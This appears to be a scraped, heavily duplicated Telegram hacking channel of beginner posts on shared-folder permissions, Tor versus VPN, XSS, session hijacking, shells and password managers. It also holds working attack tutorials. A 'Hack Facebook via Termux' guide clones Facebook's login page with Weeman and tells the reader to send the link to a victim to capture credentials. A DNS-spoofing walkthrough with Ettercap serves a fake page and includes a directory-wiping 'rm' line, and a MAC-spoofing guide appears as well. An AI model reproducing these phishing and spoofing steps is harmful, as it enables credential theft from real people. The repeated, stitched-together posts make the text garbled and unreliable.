β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦another methode #forbeginers how can we protect the security of shared folders in the local area network? This requires the following means:
When setting access permissions for shared folders, set important shared files as read-only.
1) Most of the time, users only need to view or copy the shared file, and often do not directly modify the shared folder. However, for convenience, some employees directly share a folder and file in a readable and writable manner. This is very dangerous.
2) On the one hand, these unrestricted shared file homes and shared files have become carriers of virus transmission. During my work, I discovered that some users do not have permission restrictions when sharing files. After some time, I went to look at the shared file again, and found that there were traces of viruses or Trojan horses in some shared files or shared folders.
3) It turns out that because this shared folder has write permissions, how other users open this file, if there is a virus or Trojan horse in this computer, it will be infected to this shared folder. In this way, other computers that access this shared folder are also caught. It can be seen that the shared folders without protection measures and the shared files inside have become a good carrier for virus transmission.
4) On the other hand, when the data is changed illegally, it is difficult to find out who is playing the prank. Although the relevant log information can be used to query who has accessed the shared file and whether any changes have been made. However, based on this information alone, it is impossible to know what changes the user made to this shared folder.
5) Sometimes, when we open a shared file, we accidentally press a space bar or a character key, accidentally overwrite a word, etc. These situations are often encountered in actual work. Sometimes, even if he finds the responsible person, he doesn't know what has been changed. Therefore, when the shared file is set to be writable, it is difficult to prevent employees from changing it intentionally or unintentionally.
6) Third, if files are shared in a writable way, the unity of data may not be guaranteed. For example, the personnel department has shared an attendance file in a readable and writable manner. At this time, if the financial department modifies this document, the personnel department does not know. Because the financial staff may forget to tell the personnel department, at this time, the data between the two departments will be inconsistent, which may cause some unnecessary troubles.
>Moreover, since there is no relevant evidence, no one can tell who is right and who is wrong.
7) In order to solve these problems, I suggest that corporate users, when sharing folders, it is best to set the permissions of the folder to read-only. If this shared folder sometimes needs to save files in this folder by other users, it cannot be set as read-only. Then we can also set the files in the shared folder as read-only.
> In this case, because the folders are read-only, viruses and Trojan horses cannot infect these folders, thereby avoiding being a source of contamination for spreading viruses; moreover, it can also prevent unauthorized changes by users, which may lead to inconsistent data. and many more.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦another methode #forbeginers how can we protect the security of shared folders in the local area network? This requires the following means:
When setting access permissions for shared folders, set important shared files as read-only.
1) Most of the time, users only need to view or copy the shared file, and often do not directly modify the shared folder. However, for convenience, some employees directly share a folder and file in a readable and writable manner. This is very dangerous.
2) On the one hand, these unrestricted shared file homes and shared files have become carriers of virus transmission. During my work, I discovered that some users do not have permission restrictions when sharing files. After some time, I went to look at the shared file again, and found that there were traces of viruses or Trojan horses in some shared files or shared folders.
3) It turns out that because this shared folder has write permissions, how other users open this file, if there is a virus or Trojan horse in this computer, it will be infected to this shared folder. In this way, other computers that access this shared folder are also caught. It can be seen that the shared folders without protection measures and the shared files inside have become a good carrier for virus transmission.
4) On the other hand, when the data is changed illegally, it is difficult to find out who is playing the prank. Although the relevant log information can be used to query who has accessed the shared file and whether any changes have been made. However, based on this information alone, it is impossible to know what changes the user made to this shared folder.
5) Sometimes, when we open a shared file, we accidentally press a space bar or a character key, accidentally overwrite a word, etc. These situations are often encountered in actual work. Sometimes, even if he finds the responsible person, he doesn't know what has been changed. Therefore, when the shared file is set to be writable, it is difficult to prevent employees from changing it intentionally or unintentionally.
6) Third, if files are shared in a writable way, the unity of data may not be guaranteed. For example, the personnel department has shared an attendance file in a readable and writable manner. At this time, if the financial department modifies this document, the personnel department does not know. Because the financial staff may forget to tell the personnel department, at this time, the data between the two departments will be inconsistent, which may cause some unnecessary troubles.
>Moreover, since there is no relevant evidence, no one can tell who is right and who is wrong.
7) In order to solve these problems, I suggest that corporate users, when sharing folders, it is best to set the permissions of the folder to read-only. If this shared folder sometimes needs to save files in this folder by other users, it cannot be set as read-only. Then we can also set the files in the shared folder as read-only.
> In this case, because the folders are read-only, viruses and Trojan horses cannot infect these folders, thereby avoiding being a source of contamination for spreading viruses; moreover, it can also prevent unauthorized changes by users, which may lead to inconsistent data. and many more.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers
If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.
1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.
2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.
3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.
enjoyβ€οΈππ»
#wikiresources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers
If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.
1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.
2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.
3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.
enjoyβ€οΈππ»
#wikiresources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Session Hijacking Attacks :
#forbeginers
- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.
- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the userβs browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.
S p e c i f i c a l l y :
1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.
2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.
M E T H O D E S :
There are several different ways to compromise a session token:
1) By predicting a weak session token
2) Through session sniffing
3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)
4) Through man-in-the-middle (MITM) attacks (phishing, etc.)
ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Session Hijacking Attacks :
#forbeginers
- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.
- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the userβs browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.
S p e c i f i c a l l y :
1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.
2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.
M E T H O D E S :
There are several different ways to compromise a session token:
1) By predicting a weak session token
2) Through session sniffing
3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)
4) Through man-in-the-middle (MITM) attacks (phishing, etc.)
ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - evait-security/weeman: HTTP server for phishing in python
HTTP server for phishing in python. Contribute to evait-security/weeman development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Change the MAC Address
#forBeginers
In a Kali Linux, it is very easy to spoof the MAC address. This can be done by opening the terminal window in the Kali Linux system. Initially, we will check all of the adapters that are using the ifconfig command, as shown:
1) $ sudo ifconfig
2) $ sudo ifconfig eth0 down
3) Next, we will change the MAC address. This can be done by entering the following command:
$ sudo macchanger -r eth0
4) In this command, the -r flag is used to change the current MAC address to the random MAC address in the network interface of eth0.
In the screenshot above, note that the MAC address has been successfully spoofed. Now, we will turn on the network interface again.
5) This can be done by entering the following command:
$ sudo ifconfig eth0 up
6) Next, it is necessary to check the MAC address again with the help of the ifconfig command:
$ sudo ifconfig
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Change the MAC Address
#forBeginers
In a Kali Linux, it is very easy to spoof the MAC address. This can be done by opening the terminal window in the Kali Linux system. Initially, we will check all of the adapters that are using the ifconfig command, as shown:
1) $ sudo ifconfig
2) $ sudo ifconfig eth0 down
3) Next, we will change the MAC address. This can be done by entering the following command:
$ sudo macchanger -r eth0
4) In this command, the -r flag is used to change the current MAC address to the random MAC address in the network interface of eth0.
In the screenshot above, note that the MAC address has been successfully spoofed. Now, we will turn on the network interface again.
5) This can be done by entering the following command:
$ sudo ifconfig eth0 up
6) Next, it is necessary to check the MAC address again with the help of the ifconfig command:
$ sudo ifconfig
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAN-IN-MIDDLE ATTACK #ForBeginers :
π»π΄π 'π π π π°π π :
Launch the Parrot or Kali Linux machine to get started.
Set up the DNS config file in Ettercap
1) Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.
$ gedit /etc/ettercap/etter.dns
2) You will be displayed the DNS configuration file.
3) Next, youβll need to type your address in the terminal
>* a 10.0.2.15
4) Check your IP address by typing ifconfig in a new terminal if you donβt already know what it is.
To save changes, press ctrl+x, and press (y) bottom.
Prepare the Apache server
5) Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.
6) Run the following command to format the HTML directory:
$ Rm /Var/Www/Html/*
7) Next up, youβll need to save your fake security page and upload it to the directory weβve mentioned. Type the following in the terminal to start the upload:
$ mv /root/Desktop/fake.html /var/www/html
8) Now fire up the Apache Server with the following command:
$ sudo service apache2 start
9) Youβll see that the server has successfully launched.
Spoofing with Ettercap addon
Now weβll see how Ettercap would come into play. We will be DNS spoofing with Ettercap.
10) Launch the app by typing:
$ettercap -G
source linux forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAN-IN-MIDDLE ATTACK #ForBeginers :
π»π΄π 'π π π π°π π :
Launch the Parrot or Kali Linux machine to get started.
Set up the DNS config file in Ettercap
1) Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.
$ gedit /etc/ettercap/etter.dns
2) You will be displayed the DNS configuration file.
3) Next, youβll need to type your address in the terminal
>* a 10.0.2.15
4) Check your IP address by typing ifconfig in a new terminal if you donβt already know what it is.
To save changes, press ctrl+x, and press (y) bottom.
Prepare the Apache server
5) Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.
6) Run the following command to format the HTML directory:
$ Rm /Var/Www/Html/*
7) Next up, youβll need to save your fake security page and upload it to the directory weβve mentioned. Type the following in the terminal to start the upload:
$ mv /root/Desktop/fake.html /var/www/html
8) Now fire up the Apache Server with the following command:
$ sudo service apache2 start
9) Youβll see that the server has successfully launched.
Spoofing with Ettercap addon
Now weβll see how Ettercap would come into play. We will be DNS spoofing with Ettercap.
10) Launch the app by typing:
$ettercap -G
source linux forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Shell? Understand the concept of Shell in 1 minute! #ForBeginers
> The operating systems we use now (Windows, Mac OS, Android , iOS, etc.) are all with a graphical interface, simple and intuitive, easy to use, for professional users (programmers, network managers, etc.) and ordinary users (housewives, elderly, etc.) ) Are very applicable; the popularity of computers is inseparable from the graphical interface.
> However, in the early days of computers, there was no graphical interface. We could only control the computer through commands one by one. There are hundreds of these commands, not to mention that it is very difficult to remember these commands. "Black screen" itself is a boring thing; computers at this time are far from being cool and popular, and only professionals can use it.
> the only thing that can control the computer hardware (CPU, memory, display, etc.) is the kernel of the operating system. The graphical interface and the command line are just a bridge between the user and the kernel.
If you do not understand the role of the operating system, please go to " What is an operating system ".
Due to security, complexity, cumbersome and other reasons, users cannot directly access the kernel (not necessary), and need to develop another program to allow users to directly use this program; the function of the program is to receive user operations (click on the icon, enter commands) , And perform simple processing, and then pass to the kernel, so that users can indirectly use the operating system kernel. You see, adding a layer of "agent" between the user and the kernel can not only simplify the user's operation, but also ensure the security of the kernel. Why not?
> The user interface and command line are this separately developed program, which is the "agent". Under Linux, this command line program is called Shell .
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Shell? Understand the concept of Shell in 1 minute! #ForBeginers
> The operating systems we use now (Windows, Mac OS, Android , iOS, etc.) are all with a graphical interface, simple and intuitive, easy to use, for professional users (programmers, network managers, etc.) and ordinary users (housewives, elderly, etc.) ) Are very applicable; the popularity of computers is inseparable from the graphical interface.
> However, in the early days of computers, there was no graphical interface. We could only control the computer through commands one by one. There are hundreds of these commands, not to mention that it is very difficult to remember these commands. "Black screen" itself is a boring thing; computers at this time are far from being cool and popular, and only professionals can use it.
> the only thing that can control the computer hardware (CPU, memory, display, etc.) is the kernel of the operating system. The graphical interface and the command line are just a bridge between the user and the kernel.
If you do not understand the role of the operating system, please go to " What is an operating system ".
Due to security, complexity, cumbersome and other reasons, users cannot directly access the kernel (not necessary), and need to develop another program to allow users to directly use this program; the function of the program is to receive user operations (click on the icon, enter commands) , And perform simple processing, and then pass to the kernel, so that users can indirectly use the operating system kernel. You see, adding a layer of "agent" between the user and the kernel can not only simplify the user's operation, but also ensure the security of the kernel. Why not?
> The user interface and command line are this separately developed program, which is the "agent". Under Linux, this command line program is called Shell .
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE COMMUNITY
BURPSUITE FULL PRACTICAL.pdf
COMMANDS + PICTURES + EXAMPLES #FORBeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why a beginer should Learn multiple programming languages ?
#forBeginers
As we all know, in order to break the rules, you need to know them first. The same principle works for programming: in order to crack someone's code, you must know how programming languages ββwork and be able to program yourself. Some of the more recommended languages ββfor learning:
A) Python: This is perhaps the best language for web development. Two large frameworks are written on it, on which a huge number of web applications have been created, these are Flask and Django. The language is well built and well documented. Most importantly, it is very easy to learn. By the way, many developers use Python to create simple and complete automation.
B) C ++: a language used in industrial programming. It is taught in schools and universities. Servers are written on it. I recommend that you start learning languages ββwith it, since it contains all the principles of OOP. Having learned to work with it, you can easily master other languages.
C) JavaScript, JQuery: Basically almost all sites use JS and JQuery. You need to be aware that these sites depend on JS, such as password forms. After all, some sites do not allow you to select and copy some information, do not allow you to download a file or view the content, however, to do this, it is enough to disable JS in the browser. Well, to disable JavaScript, you need to know: a) in what situations the work (protection) of the site depends on it; b) how JavaScript is connected and in what ways you can block scripts.
D) SQL: the fun part. All passwords, personal data are stored in databases written in SQL. The most common database management system is MySQL. To understand how to use MySQL injection, you need to know what MySQL injection is. To grasp the essence of MySQL injection, you need to know what MySQL queries are, what the syntax of these queries is, what the database structure is, how data is stored, what tables are, etc.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why a beginer should Learn multiple programming languages ?
#forBeginers
As we all know, in order to break the rules, you need to know them first. The same principle works for programming: in order to crack someone's code, you must know how programming languages ββwork and be able to program yourself. Some of the more recommended languages ββfor learning:
A) Python: This is perhaps the best language for web development. Two large frameworks are written on it, on which a huge number of web applications have been created, these are Flask and Django. The language is well built and well documented. Most importantly, it is very easy to learn. By the way, many developers use Python to create simple and complete automation.
B) C ++: a language used in industrial programming. It is taught in schools and universities. Servers are written on it. I recommend that you start learning languages ββwith it, since it contains all the principles of OOP. Having learned to work with it, you can easily master other languages.
C) JavaScript, JQuery: Basically almost all sites use JS and JQuery. You need to be aware that these sites depend on JS, such as password forms. After all, some sites do not allow you to select and copy some information, do not allow you to download a file or view the content, however, to do this, it is enough to disable JS in the browser. Well, to disable JavaScript, you need to know: a) in what situations the work (protection) of the site depends on it; b) how JavaScript is connected and in what ways you can block scripts.
D) SQL: the fun part. All passwords, personal data are stored in databases written in SQL. The most common database management system is MySQL. To understand how to use MySQL injection, you need to know what MySQL injection is. To grasp the essence of MySQL injection, you need to know what MySQL queries are, what the syntax of these queries is, what the database structure is, how data is stored, what tables are, etc.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IDEAS & NOTE FOR BEGINERS :
#forBeginers
1) Worms (Worms)
network worms spread from one system to another through a network connection
. The network mechanism used by the worm to complete its own replication.
E-mail mechanism.
Remote execution capability.
Remote login capability. The
process of worm reproduction.
Check the host table or similar place where the remote system address is stored. Search for the system to be infected,
establish a connection with the remote host,
copy yourself into the remote system and run the copy of the
2) computer virus (Viruses), the
biological concept of a virus,
small DNA or RNA gene segments
According to statistics, as of 2000.11, there are a total of more than 55,000
viruses with the characteristics of
viruses.
Antivirus methods
π§ββοΈComputer viruses (referred to as viruses) are programs that can infect other programs. The main characteristics of viruses are as follows:
β Dependence.
β‘ The virus is contagious.
β’ The virus is latent.
β£ Viruses are destructive.
β€ The virus is targeted.
π§ββοΈThe structural :
-boot module of the virus is responsible for guiding the virus to the memory, protecting the corresponding storage space to prevent it from being overwritten by other programs, and modifying some necessary system parameters to prepare for the activation of the virus.
-The infection module is responsible for infecting viruses to other computer programs. It is the core of the entire virus program and consists of two parts: one part judges whether the infection conditions are met, and the other part implements the infection.
-The performance module virus trigger condition determines
the specific performance part of some viruses.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IDEAS & NOTE FOR BEGINERS :
#forBeginers
1) Worms (Worms)
network worms spread from one system to another through a network connection
. The network mechanism used by the worm to complete its own replication.
E-mail mechanism.
Remote execution capability.
Remote login capability. The
process of worm reproduction.
Check the host table or similar place where the remote system address is stored. Search for the system to be infected,
establish a connection with the remote host,
copy yourself into the remote system and run the copy of the
2) computer virus (Viruses), the
biological concept of a virus,
small DNA or RNA gene segments
According to statistics, as of 2000.11, there are a total of more than 55,000
viruses with the characteristics of
viruses.
Antivirus methods
π§ββοΈComputer viruses (referred to as viruses) are programs that can infect other programs. The main characteristics of viruses are as follows:
β Dependence.
β‘ The virus is contagious.
β’ The virus is latent.
β£ Viruses are destructive.
β€ The virus is targeted.
π§ββοΈThe structural :
-boot module of the virus is responsible for guiding the virus to the memory, protecting the corresponding storage space to prevent it from being overwritten by other programs, and modifying some necessary system parameters to prepare for the activation of the virus.
-The infection module is responsible for infecting viruses to other computer programs. It is the core of the entire virus program and consists of two parts: one part judges whether the infection conditions are met, and the other part implements the infection.
-The performance module virus trigger condition determines
the specific performance part of some viruses.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do I stop Google Chrome from Restoring Tabs?
#forBeginers
Β» Method of Stopping Google Chrome from Restoring Tabs:
For stopping Google Chrome from restoring tabs, you will need to perform the following steps:
1) Launch Google Chrome by double-clicking on its shortcut icon located on your desktop.
2) Now click on the three dots located at the top right corner of your Google Chrome window
3) As soon as you will click on this icon, a cascading menu will appear on your screen. Select the Settings option from this menu
4) In the Google Chrome Settings window, scroll down to the βOn start-upβ section and then select the Open the New Tab page radio button as highlighted in the image shown below for restricting Google Chrome from restoring tabs.
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do I stop Google Chrome from Restoring Tabs?
#forBeginers
Β» Method of Stopping Google Chrome from Restoring Tabs:
For stopping Google Chrome from restoring tabs, you will need to perform the following steps:
1) Launch Google Chrome by double-clicking on its shortcut icon located on your desktop.
2) Now click on the three dots located at the top right corner of your Google Chrome window
3) As soon as you will click on this icon, a cascading menu will appear on your screen. Select the Settings option from this menu
4) In the Google Chrome Settings window, scroll down to the βOn start-upβ section and then select the Open the New Tab page radio button as highlighted in the image shown below for restricting Google Chrome from restoring tabs.
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
